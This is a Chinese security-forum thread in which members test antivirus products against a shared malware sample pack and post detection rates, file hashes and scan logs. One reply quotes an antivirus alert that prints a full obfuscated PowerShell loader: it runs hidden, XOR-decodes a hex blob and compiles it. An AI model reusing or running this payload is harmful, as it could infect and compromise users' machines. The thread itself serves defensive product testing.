楼主: QVM360
收起左侧

[病毒样本] 【开放测试】卡饭病毒样本包 20200826 第110期

   关闭 [复制链接]
yiyi2000
发表于 2020-8-26 11:53:13 | 显示全部楼层
本帖最后由 yiyi2000 于 2020-8-26 12:35 编辑

测试环境:LTSC 2019 Hyper-V
测试产品:fs computer protection 20.4
病毒库版本:最新
测试项目:扫描+执行
测试配置:  标准
结果:监控(31  / 48 ) + 扫描( 2 /48  )+执行(0/48)= 总计 ( 33 / 48 )=68.75%
截图:

dg没发挥作用

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
超级无敌
发表于 2020-8-26 12:29:27 | 显示全部楼层
支持

评分

参与人数 1经验 -2 收起 理由
记录微笑 -2 灌水

查看全部评分

欧阳宣
头像被屏蔽
发表于 2020-8-26 12:33:27 | 显示全部楼层
本帖最后由 欧阳宣 于 2020-8-26 13:19 编辑

BEST win10 x64 2004
右键加扫描后剩余4x

1e50def0ddae21bab0e2aad5512ffc40cdd499cc1fdcf6d64414d5b91aea9482
7f8c877cb86bef568cecb672de107abed2fb7a7b868ab6e9ed50bc7f6b07c45a ATC拦截
178a8e661c5254c6009898e8b7a2d29ec404149fb8924259053ea02bbf0d642e
  1. On-Access scanning has detected an execution of a malicious command line.The process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe was blocked because of the execution of a malicious command line -WindowStyle Hidden function k3164a6 {param($kd6ca69)$kc5882c='ja69824';$uc992='';for ($i=0; $i -lt $kd6ca69.length;$i+=2){$d7faf=[convert]::ToByte($kd6ca69.Substring($i,2),16);$uc992+=[char]($d7faf -bxor $kc5882c[($i/2)%$kc5882c.length]);}return $uc992;} $gd4bb8e = '1f125f575f12671312425c5509411908585e18614d1915535416604104155f545d1c7d0415534b5742670f1340505b5747511445505655143918454d5d5f1a2e08575e565d471e08554a034747030f51196b4b471e045b17717d0f1f125f575f12671312425c551c7a0f150d34324241080d5f5a1851580b1245194d00010e05054263765806285b4957404042435d5c4a5c510652041b14775a1e134f69575b5a1e5c147e5d4664180e55785c56460f12451b116f441f035a505b12471e0042505b12511215534b56127d0415664d4a124259070f0c5e1a7d0415664d4a12445e05545c5c0118191544505655141a04520c5a1b0f31255a55715f44051342111a5951180f53550b00164624584d4a4b640508584d051078050052755150460b134f1b116f441f035a505b12471e0042505b12511215534b56127d0415664d4a12555907005a1041401808585e185f520800070a11096f2e0d5a7055425b18151e1b53574604045a0a0a10182f0f424b41625b030f42041a645d181543585462460515535a4c101d3711435b545b574a1242584c5b574a044e4d5d405a4a03595654124458040200001a7d0415664d4a12425202540814677d0415664d4a125b5d54535b0c1e41030f42195753500e07005c145d411e4143505646140704555b5a5750435a6d7d545e7d0711594b4c1a16210444575d5e07584f52555410182f0f424b41625b030f42041a6040062c594f5d7f51070e44401a1e670f157a584b46711813594b055455061253106541400b155f5a18574c1e04445718445b0305165b59560253031e705646641e13165e0156025c4d7f574c62401841595b01050008541a505646141a03540b0b5756435a464c5a5e5d0941454d59465d09415f574c12590b50545f091a1d1128584d6846464a00015f0d54090b52500f5b1a5f5950000d59041c485154095b06015f51070f0d04015251001b111b0f03071e580f54010c400b705646641e1318635d405b431a7f574c624018415b5d09000c5e040b4f0b540d5f071e580f54010c4d5d0a0904000b571e1b0a50040955030c0804565f50030c0806065955050c5e07515f56020f1a1b1d510850115556055859025c190f7d0415664d4a1c6e0f13591043677d0415664d4a124e5f04535c0c0f1c3f28584d68464643540d4c515c404a10505d5d06050f5c060251541c1a53530d010a1c0705070b000651461b035c5d570046514e0d081e5b1f1516485e56515e505310114976131553626512555c5955085d0f4f5a19050814024c0c071a09400b04175a7f574c624018414c0f5d54570e530b7459404702005a17795e5805027e7e545d560b0d1e0a1109790b134551595e1a290e46401053025202075c1402181057535f5b560646521f025a53505c5854115657434a28584d684646420c52080a0a000f4f6256715c405c551e1013024c5a51075b111e4e5c04505a5c001859480d44454f471e135f575f125b5805545b590f7104175f4b575c590f0f42177f57402c0e5a5d5d40640b155e117d5c420313595755575a1e4f65495d515d0b0d7056545651184f7749485e5d09004250575c700b155710181914483d6a515a06035c59011b1819140152070f0c53024243020d0806000f54551b11095a0f16166e5d5077060853574c1a1d4425594e565e5b0b05705054571c0152070f0c53024243060b09070058550f090a03505b03075d0904005b50010c0f07575f59070a0804015354520c5c07525b0006000857010850000d5c06045f52020d0806000f54551b111e5b5805545b591b0f3a13595a5d41473915574b4c7b5a0c0e165a59540d53570b575d45143a13595a5d41473915574b4c7b5a0c0e1e560a565608001f0268405b0904454a1661400b1342115b5352535800100340511e14445718020f1711435b545b574a1242584c5b574a12424b515c534a0a05080e06555c49454d4a5b5a0d41550c5c5755431a454d4a5b5a0d41460d5c50510e520b1b5253025359040d1a09471e135f575f12555907005a0510165107594b105b5a1e415f04080914035d550c5c5755442d53575f465c51081d040a1b4f0818425c1844070c58035f05715b0417534b4c1c6005234f4d5d1a575f0553581661410812424b515c5342081a0b111e055c480d580b5402094a0b115b5a5518481e4f0b540d5f0768490c56560f050562105b1b584813490c56560f05051774575a0d155e641109491804424c4a5c140b52500f5b094917'; $gd4bb8e2 = k3164a6($gd4bb8e); Add-Type -TypeDefinition $gd4bb8e2; [u25dd3]::ma1bf1();
复制代码


f9227e60aa08c8745434a1440dd6d9a134e9cb30742af65d73df1d2f734ccc74 调起wscript和powershell ATC拦截

Kaspersky用户
发表于 2020-8-26 12:38:26 | 显示全部楼层
本帖最后由 Kaspersky用户 于 2020-8-26 12:49 编辑

测试环境:Win10 2004  64位
病毒库版本:VDF版本:8.18.08.254
测试项目:扫描
测试配置:  联网,高启发状态
结果:扫描= 总计 ( 32/ 48 )≈66%
截图:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
猥琐大叔
发表于 2020-8-26 12:51:31 | 显示全部楼层
本帖最后由 猥琐大叔 于 2020-8-26 12:55 编辑

金山毒霸


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Jerry.Lin
发表于 2020-8-26 13:10:11 | 显示全部楼层
a233 发表于 2020-8-25 21:05
测试环境:Windows 8.1 X86
测试产品:Avast Free Antivirus 20.7Beta
病毒库版本:200825-6

小A界面的字体是换了么
Kaspersky用户
发表于 2020-8-26 13:11:42 | 显示全部楼层

建议检查剩余文件数以便确定真实检测数据
a233
发表于 2020-8-26 13:12:13 | 显示全部楼层
Jerry.Lin 发表于 2020-8-26 13:10
小A界面的字体是换了么

这字体是我自己换的。。
hgfrfgd
发表于 2020-8-26 13:19:01 | 显示全部楼层
本帖最后由 hgfrfgd 于 2020-8-26 13:24 编辑

测试环境:WIN10 X64 2004 实机
测试产品:金山毒霸

病毒库版本:2020.8.26.09
测试项目:扫描
测试配置:标准
结果:扫描(46/48)=(46/48)截图:[img][/img]日志:
  1. 扫描时间:[2020-08-26 13:20:57]
  2. 扫描用时:[00:00:07]
  3. 扫描类型:自定义查杀
  4. 扫描文件总数:106
  5. 扫描速度:13文件/秒
  6. 发现威胁:46个
  7. 清除威胁:46个
  8. =============================================
  9. [2020-08-26 13:23:05]
  10. 威胁:c:\users\32101\desktop\48x (2020-08-26)\00d718c6e13069d75a8f3d0795664401c28d1fadafbebf6ec8dd5e4181cfbbfa.exe
  11. 类型:win32.troj.generic_a.a.(kcloud)
  12. 处理方式:删除

  13. [2020-08-26 13:23:05]
  14. 威胁:c:\users\32101\desktop\48x (2020-08-26)\0a5606b7020f9126ad52a987d62bd5fc37047ab447976ffbf34a2e94719a4f1c.exe
  15. 类型:win32.troj.undef.(kcloud)
  16. 处理方式:删除

  17. [2020-08-26 13:23:05]
  18. 威胁:c:\users\32101\desktop\48x (2020-08-26)\0c785e354e13bb917a7609c657fc74455ce32e63beb7f58ec6476599abea20e3.exe
  19. 类型:win32.troj.banker.(kcloud)
  20. 处理方式:删除

  21. [2020-08-26 13:23:05]
  22. 威胁:c:\users\32101\desktop\48x (2020-08-26)\1444cf37ace686d216087e01592cac4f9eec94087bf0ffb81b87f70d0372e09d.exe
  23. 类型:win32.troj.generic_a.a.(kcloud)
  24. 处理方式:删除

  25. [2020-08-26 13:23:05]
  26. 威胁:c:\users\32101\desktop\48x (2020-08-26)\14d8d1ab569f6116e3a0823e246a78512503f66db2c60a5eba2df773bac142d8.exe
  27. 类型:win32.troj.banker.(kcloud)
  28. 处理方式:删除

  29. [2020-08-26 13:23:05]
  30. 威胁:c:\users\32101\desktop\48x (2020-08-26)\177bf9e7c196a84adc0a1bb1dde49aadbd26cf4fff71c5ace17d98fdadde22fe.exe
  31. 类型:win32.troj.undef.(kcloud)
  32. 处理方式:删除

  33. [2020-08-26 13:23:05]
  34. 威胁:c:\users\32101\desktop\48x (2020-08-26)\178a8e661c5254c6009898e8b7a2d29ec404149fb8924259053ea02bbf0d642e.xlsm
  35. 类型:win32.scriptc.undef.a.(kcloud)
  36. 处理方式:修复

  37. [2020-08-26 13:23:05]
  38. 威胁:c:\users\32101\desktop\48x (2020-08-26)\22ecb0e895a1aabb64acd7ebf3a73e5fa3fc93147cf4a9f3ac194d493df3dfea.xlsm
  39. 类型:script.vba.generic.yz.(kcloud)
  40. 处理方式:修复

  41. [2020-08-26 13:23:05]
  42. 威胁:c:\users\32101\desktop\48x (2020-08-26)\4cb6856a94dca860899a45e1c875145be685e0881a5751b75fb40a6be289377f.exe
  43. 类型:win32.troj.generic_a.a.(kcloud)
  44. 处理方式:删除

  45. [2020-08-26 13:23:05]
  46. 威胁:c:\users\32101\desktop\48x (2020-08-26)\8a078f4a4c39b675b03380c3f10bf620a1ce6d4a91a50e285547d69b520d9a53.doc
  47. 类型:win32.scriptc.undef.a.(kcloud)
  48. 处理方式:修复

  49. [2020-08-26 13:23:05]
  50. 威胁:c:\users\32101\desktop\48x (2020-08-26)\1e50def0ddae21bab0e2aad5512ffc40cdd499cc1fdcf6d64414d5b91aea9482.exe
  51. 类型:win32.troj.generic.yz.(kcloud)
  52. 处理方式:删除

  53. [2020-08-26 13:23:05]
  54. 威胁:c:\users\32101\desktop\48x (2020-08-26)\3babaa9093fee2eea5d8c725e3479462cdfc531c0b70cfc9e64164c6744a3513.exe
  55. 类型:win32.troj.banker.(kcloud)
  56. 处理方式:删除

  57. [2020-08-26 13:23:05]
  58. 威胁:c:\users\32101\desktop\48x (2020-08-26)\44da04db40699148289150c5ddfc1b2e481563a3b7c373909fb619df32aba19c.exe
  59. 类型:win32.troj.generic_a.a.(kcloud)
  60. 处理方式:删除

  61. [2020-08-26 13:23:05]
  62. 威胁:c:\users\32101\desktop\48x (2020-08-26)\4d90a8e00ec4584afea6eb7cd6cf5d0b09eb118ecea200f1ab30e4251a8b9855.exe
  63. 类型:win32.hack.undef.(kcloud)
  64. 处理方式:删除

  65. [2020-08-26 13:23:05]
  66. 威胁:c:\users\32101\desktop\48x (2020-08-26)\5f72fd269fd4182bfb93c2f4b617c02cb004430cec77c16f46697ee20fd507a5.exe
  67. 类型:win32.troj.banker.(kcloud)
  68. 处理方式:删除

  69. [2020-08-26 13:23:05]
  70. 威胁:c:\users\32101\desktop\48x (2020-08-26)\618f32fa9ab83b6c6a2154cd854b5777c8445d43ac40f4ff420d7edd46a7fb01.exe
  71. 类型:win32.troj.undef.(kcloud)
  72. 处理方式:删除

  73. [2020-08-26 13:23:05]
  74. 威胁:c:\users\32101\desktop\48x (2020-08-26)\68299a76d85574db59638a4db05e6f9f85bb49b59ebdf2e27833555baa5a76ea.exe
  75. 类型:win32.troj.banker.(kcloud)
  76. 处理方式:删除

  77. [2020-08-26 13:23:05]
  78. 威胁:c:\users\32101\desktop\48x (2020-08-26)\6ed094ba99e95ac5669ae7a9213f950782612676dba54e971698d127be6e9d75.exe
  79. 类型:win32.troj.undef.(kcloud)
  80. 处理方式:删除

  81. [2020-08-26 13:23:05]
  82. 威胁:c:\users\32101\desktop\48x (2020-08-26)\73b66eac73bef46fe231650a7f3f9696efe1bae7b4cbac8fdacc78ea8af9067e.exe
  83. 类型:win32.troj.banker.(kcloud)
  84. 处理方式:删除

  85. [2020-08-26 13:23:05]
  86. 威胁:c:\users\32101\desktop\48x (2020-08-26)\765e28b1d5daf76da03c3617e0ca0fa2f124e95112ac5ee3166ea19b486e32f5.exe
  87. 类型:win32.troj.banker.(kcloud)
  88. 处理方式:删除

  89. [2020-08-26 13:23:05]
  90. 威胁:c:\users\32101\desktop\48x (2020-08-26)\7ad188a87fed28bbb4570f32ad729c492d434b8d3efdc1eac6d0b1cd5950955a.dll
  91. 类型:win32.trojdownloader.gangola.ay.(kcloud)
  92. 处理方式:删除

  93. [2020-08-26 13:23:05]
  94. 威胁:c:\users\32101\desktop\48x (2020-08-26)\7f8c877cb86bef568cecb672de107abed2fb7a7b868ab6e9ed50bc7f6b07c45a.exe
  95. 类型:win32.troj.undef.(kcloud)
  96. 处理方式:删除

  97. [2020-08-26 13:23:05]
  98. 威胁:c:\users\32101\desktop\48x (2020-08-26)\8287c0ee920f91527cec78ed8534470c69ed84d14b8c4c25b96b44f9b89e5b4a.exe
  99. 类型:win32.troj.banker.(kcloud)
  100. 处理方式:删除

  101. [2020-08-26 13:23:05]
  102. 威胁:c:\users\32101\desktop\48x (2020-08-26)\8742a613fb522f2973067da415ba0ad81c40b511ce59bf7f0dce87a5334d81d0.exe
  103. 类型:win32.troj.banker.(kcloud)
  104. 处理方式:删除

  105. [2020-08-26 13:23:05]
  106. 威胁:c:\users\32101\desktop\48x (2020-08-26)\87578141812b3a35c28f9d345b795414085ed3f92f5d1aac844fb5a2bb1ee985.exe
  107. 类型:win32.troj.banker.(kcloud)
  108. 处理方式:删除

  109. [2020-08-26 13:23:05]
  110. 威胁:c:\users\32101\desktop\48x (2020-08-26)\9810d012a117ab76851267b70b5881d9c8ff4d12909f9f0dbc2940fa89f8b9a8.exe
  111. 类型:win32.troj.banker.(kcloud)
  112. 处理方式:删除

  113. [2020-08-26 13:23:05]
  114. 威胁:c:\users\32101\desktop\48x (2020-08-26)\9a7f7cc5305ff5e91abaef3c98078b35b7a23902cece650307a131d1297c7447.exe
  115. 类型:win32.troj.banker.(kcloud)
  116. 处理方式:删除

  117. [2020-08-26 13:23:05]
  118. 威胁:c:\users\32101\desktop\48x (2020-08-26)\a3eaff031414df0b1f4adc08dcc7463115e84da56bd9609bc490426d7e9b95cb.exe
  119. 类型:win32.troj.generic_a.a.(kcloud)
  120. 处理方式:删除

  121. [2020-08-26 13:23:05]
  122. 威胁:c:\users\32101\desktop\48x (2020-08-26)\aa287f4dffd12167e3c5516269096dca07f158e719d2067d150151664550dcec.exe
  123. 类型:win32.troj.banker.(kcloud)
  124. 处理方式:删除

  125. [2020-08-26 13:23:05]
  126. 威胁:c:\users\32101\desktop\48x (2020-08-26)\ae2151f91bfdc0bd36d2b46764107b32a80807e9952125396e109c7d6c80dc12.exe
  127. 类型:win32.troj.generic_a.a.(kcloud)
  128. 处理方式:删除

  129. [2020-08-26 13:23:05]
  130. 威胁:c:\users\32101\desktop\48x (2020-08-26)\b694f14b6df2e369c84221810deae989fbff10ca30f9b5c17066380cb95aad81.exe
  131. 类型:win32.troj.banker.(kcloud)
  132. 处理方式:删除

  133. [2020-08-26 13:23:05]
  134. 威胁:c:\users\32101\desktop\48x (2020-08-26)\b96213b9759c7e5141ffdd23b16cf6f28ec4a7584c501a473b55949a2a9f2a20.exe
  135. 类型:win32.troj.banker.(kcloud)
  136. 处理方式:删除

  137. [2020-08-26 13:23:05]
  138. 威胁:c:\users\32101\desktop\48x (2020-08-26)\c6e8093427b5b32a7f7df96db6beff54a598f1430209b2746f4c2f0bf0b70fae.exe
  139. 类型:win32.troj.generic_a.a.(kcloud)
  140. 处理方式:删除

  141. [2020-08-26 13:23:05]
  142. 威胁:c:\users\32101\desktop\48x (2020-08-26)\c8d4680aa4fa3178f5bb4489d611cefa0a6afe075b78ae83f902bfee9fcc895f.exe
  143. 类型:win32.troj.banker.(kcloud)
  144. 处理方式:删除

  145. [2020-08-26 13:23:05]
  146. 威胁:c:\users\32101\desktop\48x (2020-08-26)\d41b52f967922e05309d7152f5ef9f286973c4d1bfe91e8eca028b11bf17346e.exe
  147. 类型:win32.troj.banker.(kcloud)
  148. 处理方式:删除

  149. [2020-08-26 13:23:05]
  150. 威胁:c:\users\32101\desktop\48x (2020-08-26)\d4a7a189e4aacfcbf955a5ac1268de41eea9050f3ce3931fffc86191c7e8f86b.exe
  151. 类型:win32.troj.banker.(kcloud)
  152. 处理方式:删除

  153. [2020-08-26 13:23:05]
  154. 威胁:c:\users\32101\desktop\48x (2020-08-26)\dd5a38aaa7e8ae96ec1f8ed15e74993001f8c484d0dc0a6c0c470521feac2d14.exe
  155. 类型:win32.troj.banker.(kcloud)
  156. 处理方式:删除

  157. [2020-08-26 13:23:05]
  158. 威胁:c:\users\32101\desktop\48x (2020-08-26)\e53568fdb93efa1c69196f7bcbc3c28023cd72d86a2f2d8d4415f04c9334c01e.exe
  159. 类型:win32.troj.generic_a.a.(kcloud)
  160. 处理方式:删除

  161. [2020-08-26 13:23:05]
  162. 威胁:c:\users\32101\desktop\48x (2020-08-26)\eb7ffd1177253953b36abea325f582de6c2a4ed522c6a46c7829e5eb90c8d03e.exe
  163. 类型:win32.troj.generic_a.a.(kcloud)
  164. 处理方式:删除

  165. [2020-08-26 13:23:05]
  166. 威胁:c:\users\32101\desktop\48x (2020-08-26)\ed561dd12f9cbdd028370a521b65d12d8742a230715d30cb82f1f28f340da93e.exe
  167. 类型:win32.troj.zenpak.au.(kcloud)
  168. 处理方式:删除

  169. [2020-08-26 13:23:05]
  170. 威胁:c:\users\32101\desktop\48x (2020-08-26)\eda68de6706516012cda72a22a1e9e089d85ad324f47768bb982eea97836fd8d.exe
  171. 类型:win32.troj.undef.(kcloud)
  172. 处理方式:删除

  173. [2020-08-26 13:23:05]
  174. 威胁:c:\users\32101\desktop\48x (2020-08-26)\f2666522df52121560f13a02ab00e27d441fc7d65df67d8e78e3cac66b831518.exe
  175. 类型:win32.troj.generic_a.a.(kcloud)
  176. 处理方式:删除

  177. [2020-08-26 13:23:05]
  178. 威胁:c:\users\32101\desktop\48x (2020-08-26)\f7125019233ca9714d5b2b16ef66119c37bc9033597f0c39e9defa1dc0f5c1df.exe
  179. 类型:win32.troj.undef.(kcloud)
  180. 处理方式:删除

  181. [2020-08-26 13:23:05]
  182. 威胁:c:\users\32101\desktop\48x (2020-08-26)\f849ddd9944e154bc0cdea9fc21d45e53eb731043454fff4c7a2ac0d067d16b0.exe
  183. 类型:win32.troj.undef.(kcloud)
  184. 处理方式:删除

  185. [2020-08-26 13:23:05]
  186. 威胁:c:\users\32101\desktop\48x (2020-08-26)\f9227e60aa08c8745434a1440dd6d9a134e9cb30742af65d73df1d2f734ccc74.vbs
  187. 类型:win32.scriptc.undef.a.(kcloud)
  188. 处理方式:删除

  189. [2020-08-26 13:23:05]
  190. 威胁:c:\users\32101\desktop\48x (2020-08-26)\ff76611591d2b7bd32b19065037c6b88d478b074335468b0fb307edcd02905c4.exe
  191. 类型:win32.troj.banker.(kcloud)
  192. 处理方式:删除

复制代码

Kaspersky用户
发表于 2020-8-26 13:42:08 | 显示全部楼层
hgfrfgd 发表于 2020-8-26 13:19
测试环境:WIN10 X64 2004 实机
测试产品:金山毒霸
病毒库版本:2020.8.26.09

全云杀
有点东西
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-18 22:55 , Processed in 0.093347 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表